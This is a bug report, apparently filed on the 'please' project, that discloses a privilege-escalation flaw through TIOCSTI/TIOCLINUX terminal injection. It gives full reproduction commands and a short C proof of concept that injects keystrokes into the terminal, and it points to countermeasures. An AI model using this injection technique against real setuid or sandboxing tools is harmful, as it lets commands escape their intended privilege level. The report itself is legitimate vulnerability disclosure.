[Git master] Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
Hi!
I believe that please
is vulnerabily to privilege escalation using ioctls TIOCSTI
and TIOCLINUX
. Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
- This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
-
ttyjack allows playing with
TIOCSTI
andTIOCLINUX
comfortably. - Of the three known options for counter measures, use of a PTY is currently considered the best solution.
- For a list of other software known affected by this issue see https://github.com/hartwork/antijack#related-cves-not-mine .
- The code above is inspired by https://github.com/containers/bubblewrap/issues/142 .
Best, Sebastian
Edited by Sebastian Pipping